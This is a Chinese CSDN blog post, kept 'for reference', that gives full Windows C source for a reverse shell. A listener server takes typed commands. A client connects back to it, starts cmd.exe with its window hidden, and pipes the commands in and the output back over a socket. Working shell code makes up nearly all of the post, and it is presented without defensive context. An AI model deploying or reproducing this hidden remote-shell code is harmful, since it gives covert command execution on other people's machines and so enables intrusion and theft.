双管道cmd反弹程序

最新推荐文章于 2024-06-17 13:19:21 发布

寒江雪语

最新推荐文章于 2024-06-17 13:19:21 发布

阅读量2k

点赞数 1

分类专栏： windows编程

本文链接：https://blog.csdn.net/hjxyshell/article/details/50572532

版权

windows编程专栏收录该内容

11 篇文章 2 订阅

订阅专栏

仅此记录，以备查询

server:


#include <WINSOCK2.H>
#include <windows.h>
#include <stdio.h>
#include <process.h>
#pragma comment(lib,"ws2_32.lib")


void ReceiveThread(LPVOID lPvoid)
{
	SOCKET socketNew = (SOCKET)lPvoid;
	while(1)
	{
		char receiveBuf[1024];//接收
		int len = recv(socketNew,receiveBuf,sizeof(receiveBuf),0);
		if(len <= 0)
		{
			closesocket(socketNew);
			printf("socket error...\n");
			ExitThread(0);
		}
		receiveBuf[len] = 0;
		printf("%s",receiveBuf);
	}
}

void SendThread(LPVOID lPvoid)
{
	SOCKET socketNew = (SOCKET)lPvoid;

	char test[] = "dir d:\\";
	char sendBuf[1024];
	
	while(1)
	{
		gets(sendBuf);        
		//printf("Send:%s\n",sendBuf);
		if(SOCKET_ERROR == send(socketNew,sendBuf,strlen(sendBuf),0))
		{
			printf("Send Error\n");
			//第一个套接字关闭后，还未退出该线程，所以输入 ，没有任何效果
			//当然这里仅是测试，正常不会不同连接应该对应不同的cmd窗口
			ExitThread(0);
		}
	}

}


void SocketThread(LPVOID lPvoid)
{
	SOCKET socketNew = (SOCKET)lPvoid;
	_beginthread(ReceiveThread, NULL, (LPVOID)socketNew);
	_beginthread(SendThread, NULL, (LPVOID)socketNew);

}

int main(int argc,char **argv)
{
	//创建套接字
	WORD myVersionRequest;
	WSADATA wsaData;
	myVersionRequest=MAKEWORD(2,2);
	int err;
	err=WSAStartup(myVersionRequest,&wsaData);
	if (!err){
		printf("已打开套接字\n");
	}else{
		printf("ERROR:嵌套字未打开!");
		return 1;
	}
	//进一步绑定套接字
	SOCKET serSocket=socket(AF_INET,SOCK_STREAM,0);//创建了可识别套接字

	//需要绑定的参数
	SOCKADDR_IN addr;
	addr.sin_family=AF_INET;
	addr.sin_addr.S_un.S_addr=htonl(INADDR_ANY);//ip地址
	addr.sin_port=htons(6000);//绑定端口

	bind(serSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR));//绑定完成
	listen(serSocket,5);//其中第二个参数代表能够接收的最多的连接数

	//
	//开始进行监听
	//
	SOCKADDR_IN clientsocket;
	int len=sizeof(SOCKADDR);

	while(1)
	{
		SOCKET socketNew = accept(serSocket,(SOCKADDR*)&clientsocket,&len);
		printf("new connection is coming....\n");
		_beginthread(SocketThread, NULL, (LPVOID)socketNew);
	}
	return 1;
}

client:

#include <WINSOCK2.H>
#include <Windows.h>
#include <stdio.h>
#include <process.h>
#pragma comment(lib,"ws2_32.lib")

HANDLE hStdInRead, hStdInWrite;
HANDLE hStdOutRead, hStdOutWrite;

SECURITY_ATTRIBUTES saIn, saOut;

SOCKET clientSocket;



BOOL CreateTwoPipe()
{
	DWORD dwRet;
	saIn.nLength = sizeof(SECURITY_ATTRIBUTES);
	saIn.bInheritHandle = TRUE;
	saIn.lpSecurityDescriptor = NULL;
	dwRet = CreatePipe(&hStdInRead, &hStdInWrite, &saIn, 0);
	if(!dwRet)
	{
		printf("failed to create in pipe...\n");
		return FALSE;
	}

	saOut.nLength = sizeof(SECURITY_ATTRIBUTES);
	saOut.bInheritHandle = TRUE;
	saOut.lpSecurityDescriptor = NULL;
	dwRet = CreatePipe(&hStdOutRead, &hStdOutWrite, &saOut, 0);
	if(!dwRet)
	{
		printf("failed to create in pipe...\n");
		return FALSE;
	}

	STARTUPINFO si;
	ZeroMemory(&si, sizeof(si));
	si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	si.wShowWindow=SW_HIDE; 
	si.hStdInput = hStdInRead;
	si.hStdOutput = hStdOutWrite;
	si.hStdError = hStdOutWrite;
	char cmdline[]="cmd.exe";
	PROCESS_INFORMATION ProcessInformation; 
	dwRet = CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation); 

	return TRUE;

}

void ReadOutPutReadCmd(LPVOID lPvoid)
{
	DWORD dwByteRecv;
	char Buf[1024] = {0};
	int ret;

	while(1)
	{
		memset(Buf, 0, sizeof(Buf));
		PeekNamedPipe(hStdOutRead, Buf, 1024, &dwByteRecv, 0, 0);
		if(dwByteRecv)
		{
			ret = ReadFile(hStdOutRead, Buf, dwByteRecv, &dwByteRecv, 0);
			if(!ret)
				break;
			ret = send(clientSocket, Buf, dwByteRecv, 0);
			if(ret <= 0)
				break;
		}
	}

}


int main(int argc,char **argv)
{
	int err;
	WORD versionRequired;
	WSADATA wsaData;
	versionRequired=MAKEWORD(2,2);
	err=WSAStartup(versionRequired,&wsaData);//协议库的版本信息
	if (!err)    {
		printf("客户端嵌套字已经打开!\n");
	}else{
		printf("ERROR:客户端的嵌套字打开失败!\n");
		return 1;//结束
	}
	clientSocket=socket(AF_INET,SOCK_STREAM,0);

	SOCKADDR_IN clientsock_in;
	clientsock_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");
	clientsock_in.sin_family=AF_INET;
	clientsock_in.sin_port=htons(6000);

	//bind(clientSocket,(SOCKADDR*)&clientsock_in,strlen(SOCKADDR));//注意第三个参数
	//listen(clientSocket,5);
	int ret = connect(clientSocket,(SOCKADDR*)&clientsock_in,sizeof(SOCKADDR));//开始连接
	if(ret != 0)
	{
		printf("failed to connect to server...\n");
		return 0;
	}

	if(!CreateTwoPipe())
	{
		printf("failed to create pipe...\n");
		return 0;
	}

	DWORD dwByteRecv;
	char Buf[1024] = {0};

	_beginthread(ReadOutPutReadCmd, 0, NULL);

	while(1)
	{
		//memset(Buf, 0, sizeof(Buf));
		//Sleep(1000);   //等待cmd执行
		//PeekNamedPipe(hStdOutRead, Buf, 1024, &dwByteRecv, 0, 0);
		//if(dwByteRecv)
		//{
		//	ret = ReadFile(hStdOutRead, Buf, dwByteRecv, &dwByteRecv, 0);
		//	if(!ret)
		//		break;
		//	ret = send(clientSocket, Buf, dwByteRecv, 0);
		//	if(ret <= 0)
		//		break;
		//}
		//else
		//{
		//	dwByteRecv = recv(clientSocket, Buf, 1024, 0);

		//	if(dwByteRecv <= 0)
		//		break;	
		//	Buf[dwByteRecv] = '\r';
		//	Buf[dwByteRecv+1] = '\n';
		//	Buf[dwByteRecv + 2] = 0;
		//	printf("recv: %s", Buf);
		//	ret = WriteFile(hStdInWrite, Buf, dwByteRecv + 2, &dwByteRecv, 0);
		//	if(!ret)
		//		break;

		//}

		dwByteRecv = recv(clientSocket, Buf, 1024, 0);

		if(dwByteRecv <= 0)
			break;	
		Buf[dwByteRecv] = '\r';
		Buf[dwByteRecv+1] = '\n';
		Buf[dwByteRecv + 2] = 0;
		printf("recv: %s", Buf);
		ret = WriteFile(hStdInWrite, Buf, dwByteRecv + 2, &dwByteRecv, 0);
		if(!ret)
			break;
	}
	closesocket(clientSocket);
	WSACleanup();
	system("pause");
	return 0;
}

寒江雪语

关注

1
点赞
踩
4

收藏

觉得还不错? 一键收藏
2
评论
双管道cmd反弹程序

仅此记录，以备查询server:#include #include #include #include #pragma comment(lib,"ws2_32.lib")void ReceiveThread(LPVOID lPvoid){ SOCKET socketNew = (SOCKET)lPvoid; while(1) { char receiveBu
复制链接

扫一扫

专栏目录